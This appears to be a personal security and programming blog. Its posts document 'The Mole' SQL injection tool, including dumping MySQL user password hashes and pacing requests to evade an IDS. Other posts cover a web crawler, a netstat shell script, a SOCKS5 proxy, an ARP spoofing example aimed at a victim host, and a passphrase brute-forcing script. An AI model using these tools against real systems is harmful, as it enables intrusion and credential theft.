Perform a query to fetch every column given, using the table TABLE located in the schema SCHEMA. A "where condition" can be given. Note that The Mole will take care of any string conversions required on the condition. Therefore, you can use string literals(using single quotes) even if the server escapes them. Note that no caching is performed when executing this command.
e.g: query mysql user User,Password where User = 'root'

- fetch [args]: This command calls schemas, tables or columns commands depending on the arguments given, forcing them to refetch entries, even if they have already been dumped. This is useful when, after having stopped a query in the middle of it, you want to fetch all of the results and not just those that you were able to dump before stopping it.
e.g: "fetch columns mysql user"

- cookie [COOKIE]: Gets/sets a cookie to be sent in each HTTP request's headers.

- mode <union|blind>: Sets the SQL Injection exploitation method. By default, union mode is used. If the injection cannot be exploited using this mode, change it to blind using "mode blind" and try again. Nothing else has to be configured to go from union to blind mode, as long as you have already set the URL and needle.

- prefix [PREFIX]: Gets/sets the prefix for each request. The prefix will be appended to the URL's vulnerable parameter on each request.

- suffix [SUFFIX]: Gets/sets the suffix for each request. The suffix will be appended after the injection code on the URL's vulnerable parameter.

- verbose <on|off>: Sets the verbose mode on and off. When this mode is on, each request's parameters will be printed out.

- output <pretty|plain>: Sets the output style. When pretty output mode is enabled (this is the default), query results will be printed in a tidy box, using column names and with each row aligned. The drawback is that this method requires the whole query to finish before printing results, so you might want to use "plain" output if you seek immediate results. In contrast, plain mode prints each result as soon as it is recovered.
e.g:
Pretty output might print results like this:

+----------------------------------------------------+
| User   | Password                                  |
+----------------------------------------------------+
| blabla | *2B0DDEE3597240B595689260B53D411F515B806D |
| foobar | *641B2485F1789F7A6BEE986648B83A899D96793B |
+----------------------------------------------------+

While plain output will print them like this:

User, Password:
blabla, *2B0DDEE3597240B595689260B53D411F515B806D
foobar, *641B2485F1789F7A6BEE986648B83A899D96793B

- timeout [TIMEOUT]: Gets/sets the timeout between requests. Use this if the server is protected by some kind of IDS that returns HTTP errors when lots of requests are executed in a short amount of time. Note that TIMEOUT can be a floating point number, so you can set "0.5" as the timeout.

- usage <COMMAND>: Print the usage for the command COMMAND.

- exit: Exit The Mole.

Example

This is a video of The Mole exploiting a SQL Injection, first using union mode, and then using blind mode:

Download

In order to download The Mole, you can visit the project's sourceforge entry: https://sourceforge.net/projects/themole.

Hound: Website crawler

2011-09-27T23:52:00.000-03:00

Hound is a website crawler I developed a couple of months ago. Today I'm releasing the 0.11 version, which includes some bug fixes and new features.

The crawler starts by crawling a given base URL. It then analyses its html code and searches for other URLs which will be collected and will be enqueued for analysis.

The crawler's behaviour is based on plugins. Different kinds of plugins affect it in a different way. One can, for example, activate certain Filter Plugins which will restrict the URLs the crawler will visit, based on each plugin's behaviour. It could be undesirable, under most circumstances, to allow Hound to visit google, facebook, or youtube. This is why a HostFilter can be used, making the crawler only visit URLs that belong to the base host.

There are different types of plugins, each executed on a certain phase of the crawling session. These can be:

Parsers: These are applied to downloaded html in order to normalise it, so that the other plugins are able to collect data without worrying about aspects such as which encoding is used or html entities.
Crawl filters: These are applied to every URL found. If a crawl filter matches a certain URL, then the latter is discarded. Host, extension and network filters are examples of them.
Collect filters: These filters are applied to collected URLs, so that they are not taken into account in the crawling results. Again, you might not want to include google links in the results.
Form collect filters: These filters are applied to form tags found in html files.
Header filters: These are applied to a downloaded file's headers. They are usually used when filtering mime-types, for example.
Collectors: The most important plugins. These take care of analysing the html files, parsing href or src attributes, among others, and feeding the crawler with new URLs.
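
As an illustration of the crawl filter idea, here is a sketch of a host filter. Hound itself is written in Python and its plugin interface is not shown in this post, so the class shape, the matches method and the host_of helper are all my assumptions; only the rule "a URL matched by a crawl filter is discarded" comes from the description above.

```cpp
#include <string>

// Extracts the host part of an absolute URL such as "http://host:80/path".
// Simplification: user info ("user@host") is not handled.
inline std::string host_of(const std::string &url) {
    const std::string::size_type scheme_end = url.find("://");
    if (scheme_end == std::string::npos)
        return std::string();
    const std::string::size_type start = scheme_end + 3;
    const std::string::size_type end = url.find_first_of(":/?#", start);
    if (end == std::string::npos)
        return url.substr(start);
    return url.substr(start, end - start);
}

// Crawl filter: matches (and therefore discards) every URL whose host
// differs from the host of the base URL.
class HostFilter {
public:
    explicit HostFilter(const std::string &base_url)
        : base_host_(host_of(base_url)) {}

    bool matches(const std::string &url) const {
        return host_of(url) != base_host_;
    }

private:
    std::string base_host_;
};
```

The comparison is exact, so in this sketch a subdomain of the base host would be filtered out as well.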

The file hound.conf contains a list of active plugins, including their arguments. Once you've picked the right configuration, you can start a crawling session by executing:

./hound http://website.to.crawl.com

The output will only be written to stdout. If you want to store it in a file, you can do it by using the -o parameter, followed by its path. This will write the results both to stdout and to the given file. If you don't want to write results to stdout, use the -n parameter.

Once the crawl session has ended, you can use hound to parse the results. Run the following command to list the URLs found:

./hound -i /tmp/hound.out -p urls

Where /tmp/hound.out is the output file used during the crawling session. You can always parse the results manually, since they're stored in text files. To list all the form tags found, execute:

./hound -i /tmp/hound.out -p forms

Which will print something like:

0 POST http://blablabla/search cms_search --- hidden +++ query --- text +++ commit --- image
1 POST http://blablabla/contact/send article_id --- hidden +++ subject --- text +++ sender_name --- text +++ sender_mail --- text +++ reset --- reset

The number on the left of each line identifies each form. This is how hound encodes forms. To generate the html code for a given form id, run:

./hound -i /tmp/hound.out -p form:0

Which will print the html code for the first form.

In order to download hound, you can visit the sourceforge project's site. It is open source, developed using python so you can have a look at the code and create new plugins to serve your needs.

Netstat shellscript

2011-09-08T00:00:00.000-03:00

This is a shellscript I coded a couple of months ago, after I found my router didn't have this utility and I wanted to check its active connections.

It only displays TCP connections, printing the source and destination IP address and port of each of them. The script requires the sh shell interpreter, making it possible to use it in systems which don't have other interpreters like bash, which provides several features which would make the script simpler.

This is the script:



#!/bin/sh

parse_num()
{
    x=$(echo $1 | sed -n 's/0*//p')
    if [ $(echo $x | wc -c) -eq 1 ]
    then
        x=0
    fi
    echo $x
}


hex_to_ip()
{
    index=7
    output=''
    while [ $index -gt 0 ] 
    do
        end=$(expr $index + 1)
        value=$(printf "%d" "0x$(parse_num $(echo $1 | cut -b $index-$end))")
        output="$output.$value"
        index=$(expr $index - 2)
    done
    echo $(echo $output | cut -b 2-)
}
printf "         Src IP  Src port          Dst IP  Dst port\n"

cat /proc/net/tcp | while read line; do
    srcip=$(hex_to_ip $(echo $line | sed -n 's/^[0-9]*: //p' | sed -n 's/:.*//p'))
    srcport=$(printf "%d" 0x$(parse_num $(echo $line | sed  -n 's/^ *[0-9]*: [0-9,A-F]*://p' | cut "-d " -f 1)))
    dstip=$(hex_to_ip $(echo $line | sed -n 's/^[0-9]*: [0-9,A-F]*:[0-9,A-F]* //p' | sed -n 's/:.*//p'))
    dstport=$(printf "%d" 0x$(parse_num $(echo $line | sed -n 's/^ *[0-9]*: [0-9,A-F]*:[0-9,A-F]* [0-9,A-F]*://p' | cut "-d " -f1)))
    
    printf "%15s %9s %15s %9s\n" $srcip $srcport $dstip $dstport
done

An output example:

Simple socks5 server in C++

2011-09-05T18:50:00.001-03:00

This is a SOCKS5 proxy server I implemented a few months ago. It's written in C++ and, as far as I have tested, works pretty well. There are a couple of things left to do, like handling domain name connection requests and improving thread handling, but it has served its purpose so far.

To compile it, you can use the GNU C++ compiler, linking the application with libpthread:

g++ -o socks5 socks5.cpp -lpthread

By default it only accepts authenticated connections, using the USERNAME define as username, and the PASSWORD define as password. If you want to allow unauthenticated connection requests, add a -DALLOW_NO_AUTH flag when compiling.
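
The behaviour described above corresponds to the SOCKS5 method negotiation (RFC 1928) followed by the username/password sub-negotiation (RFC 1929). Here is a minimal Python sketch of the two server replies involved. It is not taken from socks5.cpp: the function names and the allow_no_auth parameter are made up for illustration, and preferring username/password when the client offers both methods is an assumption.

```python
NO_AUTH, USER_PASS, NO_ACCEPTABLE = 0x00, 0x02, 0xFF


def choose_method(greeting, allow_no_auth=False):
    """Return the 2-byte server reply to a SOCKS5 client greeting."""
    version, nmethods = greeting[0], greeting[1]
    methods = greeting[2:2 + nmethods]
    if version != 5 or len(methods) != nmethods:
        raise ValueError('malformed SOCKS5 greeting')
    if USER_PASS in methods:
        chosen = USER_PASS
    elif allow_no_auth and NO_AUTH in methods:
        chosen = NO_AUTH
    else:
        chosen = NO_ACCEPTABLE
    return bytes([5, chosen])


def check_credentials(request, username, password):
    """Return the 2-byte reply to an RFC 1929 username/password request."""
    ulen = request[1]
    uname = request[2:2 + ulen]
    plen = request[2 + ulen]
    passwd = request[3 + ulen:3 + ulen + plen]
    ok = request[0] == 1 and uname == username and passwd == password
    # A status of 0 means success; any other value means failure.
    return bytes([1, 0 if ok else 1])
```

For instance, a client that only offers "no authentication" (bytes 05 01 00) is answered with 05 FF unless allow_no_auth is set, mirroring the effect the -DALLOW_NO_AUTH flag is described as having.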

The proxy server listens on port 5555; change the SERVER_PORT define if you want it to wait for connections on another port.

The source code can be downloaded from github: https://github.com/mfontanini/Programs-Scripts/blob/master/socks5/socks5.cpp.

Hope you find it useful!

ARP spoofing using libtins

2011-09-03T12:39:00.001-03:00

This is an example program I created to test libtins, a library I've been developing with some colleagues. This library allows the user to forge packets, from the link layer up to the transport or even application layer, in C++ by creating their own PDU stack and sending it without worrying about raw sockets, endianness, or low-level socket handling.

To use this program, compile it and link it with libtins. With the GNU C++ compiler, this can be done as follows:

g++ -o arpspoofing arpspoofing.cpp -ltins

Then run it with the gateway's and the victim's IP addresses as arguments, for example:

./arpspoofing 192.168.0.1 192.168.0.100

This code snippet is included as an example in the libtins source code, inside the examples folder. You can have a look at it online here.
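
To give an idea of the byte-level work a packet-crafting library takes care of, here is a rough Python sketch of an Ethernet frame carrying an ARP reply, laid out as in RFC 826. It does not use libtins and does not reproduce arpspoofing.cpp; build_arp_reply and its parameters are hypothetical names chosen for illustration, and the addresses in the usage line are placeholders.

```python
import socket
import struct


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build an Ethernet frame carrying an ARP reply (opcode 2)."""
    # Ethernet header: destination MAC, source MAC, EtherType 0x0806 (ARP).
    eth_header = target_mac + sender_mac + struct.pack('!H', 0x0806)
    arp_payload = struct.pack(
        '!HHBBH6s4s6s4s',
        1,       # hardware type: Ethernet
        0x0800,  # protocol type: IPv4
        6, 4,    # hardware and protocol address lengths
        2,       # opcode: reply
        sender_mac, socket.inet_aton(sender_ip),
        target_mac, socket.inet_aton(target_ip))
    return eth_header + arp_payload


frame = build_arp_reply(b'\xaa' * 6, '192.168.0.1', b'\xbb' * 6, '192.168.0.100')
print(len(frame))  # 42
```

Every field has to be packed in network byte order by hand here, which is the kind of detail the PDU classes are meant to hide.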

Password combination generator

2011-09-02T16:20:00.001-03:00

After several months without mounting an encrypted filesystem, I found out I had forgotten its passphrase. I remembered the words I had used, but not the case of each character, nor which characters I had replaced with numbers or symbols ('o' with '0', 's' with '5', etc.). Moreover, I didn't remember which symbol I had used to separate these words (I could have used '_', '!', '#', etc.).

So after spending half an hour trying out combinations of upper and lower case characters, digits and symbols, I came up with a script to do this automatically.

The script expects several lower-case words as arguments and prints them in the same order, varying their case and transforming characters into numbers or symbols using a conversion map. There's also a '-e' parameter, which executes a given command for each combination. The command must contain the string "{0}", which marks where each combination will be substituted.

For example, in my quest to mount my encrypted file, I used:

./dictionary.py -e "truecrypt -p {0} --non-interactive encrypted.file" one two three

Where "one two three" are the words used to perform the character combinations.

This is the script:

#!/usr/bin/python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#       
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#       
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.


import sys, os


class Word:
    # Dictionary used for conversions between characters, other than
    # simple lower-to-upper conversions. Add here as many as you want,
    # as long as you don't create a cycle ;).
    leet_map = {'A' : '4',
                'E' : '3',
                'I' : '1',
                'O' : '0',
                '1' : '!',
                'S' : '5',
                '5' : '$'
               }

    # The characters to append after each word. Only one of these will
    # be appended at a time.
    appended_list = [' ', '!', '_']
    
    # Appended characters to avoid if this Word is last in the sequence.
    # By default, no spaces will be appended at the end of the phrase,
    # however, they will be included in the middle of it.
    appended_list_avoid = [' ']
    
    
    def __init__(self, base, is_last = False):
        self.base = list(base)
        self.current = list(base)
        self.current_index = 0
        self.is_last = is_last
        self.appended = ''
        self.done = False

    # Increment a particular character. Add any conversion rules in here.
    def _next_char(self, char):
        if char.isalpha():
            if char.islower():
                return char.upper()
            else:
                if char in Word.leet_map:
                    return Word.leet_map[char]
                return char
        else:
            return char if not char in Word.leet_map else Word.leet_map[char]

    # Increment the word. Should only be called if has_next returns True.
    def next(self):
        this_char = self._next_char(self.current[self.current_index])
        if this_char == self.current[self.current_index]:
            # No more conversions for this char, reset previous ones.
            for i in range(self.current_index + 1):
                self.current[i] = self.base[i]
            self.current_index += 1
            if self.current_index < len(self.base):
                self.next()
                self.current_index = 0
            else:
                # Find the current appended character
                try:
                    index = Word.appended_list.index(self.appended)
                except ValueError:
                    index = -1
                if index == len(Word.appended_list) - 1:
                    # Appended char cannot be incremented. We're done.
                    self.done = True
                else:
                    try:
                        if self.is_last:
                            while Word.appended_list[index+1] in Word.appended_list_avoid:
                                index += 1
                        # Increment the appended character.
                        self.appended = Word.appended_list[index+1]
                        self.current_index = 0
                    except IndexError:
                        self.done = True
                
        else:
            self.current[self.current_index] = this_char

    # Returns boolean indicating whether this Word can be incremented.
    def has_next(self):
        return not self.done

    # Returns the current string.
    def get_current(self):
        return ''.join(self.current) + self.appended

    # Resets every field in this Word.
    def reset(self):
        self.current = list(self.base)
        self.current_index = 0
        self.appended = ''
        self.done = False
        

class Wordlist:
    def __init__(self, words):
        self.words = []
        for i in words[:-1]:
            self.words.append(Word(i))
        self.words.append(Word(words[-1], True))

    # Increment the words one step.
    def _inc(self, index):
        # No words to increment left
        if index == len(self.words):
            return index
        if self.words[index].has_next():
            self.words[index].next()
            if not self.words[index].has_next():
                # We've got carry. Reset words[0:index], 
                # then increment words[index+1] and propagate.
                for i in range(index+1):
                    self.words[i].reset()
                return self._inc(index+1)
            else:
                return index
        else:
            return index + 1

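    def do_action(self, to_exec):
        line = ''.join(word.get_current() for word in self.words)
        if len(to_exec) == 0:
            print(line)
        else:
            # Single-quote the combination so the shell does not expand
            # characters such as '$' that the conversions introduce.
            os.system(to_exec.format("'" + line.replace("'", "'\\''") + "'"))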

    def generate(self, to_exec):
        i = 0
        while i < len(self.words):
            self.do_action(to_exec)
            i = self._inc(0)
            


def usage():
    print(' Usage: ' + sys.argv[0] + ' [-e EXEC] <WORD1> [WORD2] [WORD3]\n')
    print(' If -e option is used, then the next parameter is the command to execute')
    print(' for each word combination. The command must contain {0} where each ')
    print(' combination will be included. Example: "echo {0}"\n')
    print(' If no command is given, then each permutation will be printed to stdout')

    sys.exit(1)

if __name__ == '__main__':
    if len(sys.argv) == 1 or '-h' in sys.argv:
        usage()

    args = sys.argv[1:]
    to_exec = ''

    if args[0] == '-e':
        if len(args) <= 2:
            usage()
        to_exec = args[1]
        args = args[2:]

    words = Wordlist(args)
    words.generate(to_exec)
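
As a compact cross-check of the per-character expansion, the same conversion chain (lower case, then upper case, then the conversion map) can be sketched with itertools.product. This is an alternative formulation rather than the approach the script above takes; it leaves out the appended separator characters, and the names variants and combinations are made up for this example.

```python
import itertools

# Same conversion map as Word.leet_map in the script.
LEET_MAP = {'A': '4', 'E': '3', 'I': '1', 'O': '0',
            '1': '!', 'S': '5', '5': '$'}


def variants(char):
    """Follow the chain lower -> upper -> mapped symbols for one character."""
    chain = [char]
    if char.islower():
        chain.append(char.upper())
    # Keep following the map until no further conversion exists.
    while chain[-1] in LEET_MAP:
        chain.append(LEET_MAP[chain[-1]])
    return chain


def combinations(word):
    """Return every variant of a single word, without appended separators."""
    return [''.join(chars) for chars in itertools.product(*map(variants, word))]


print(variants('s'))            # ['s', 'S', '5', '$']
print(len(combinations('so')))  # 12
```

The number of candidates is the product of the chain lengths of each character, which is why automating the search pays off quickly.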

Hope you find it useful!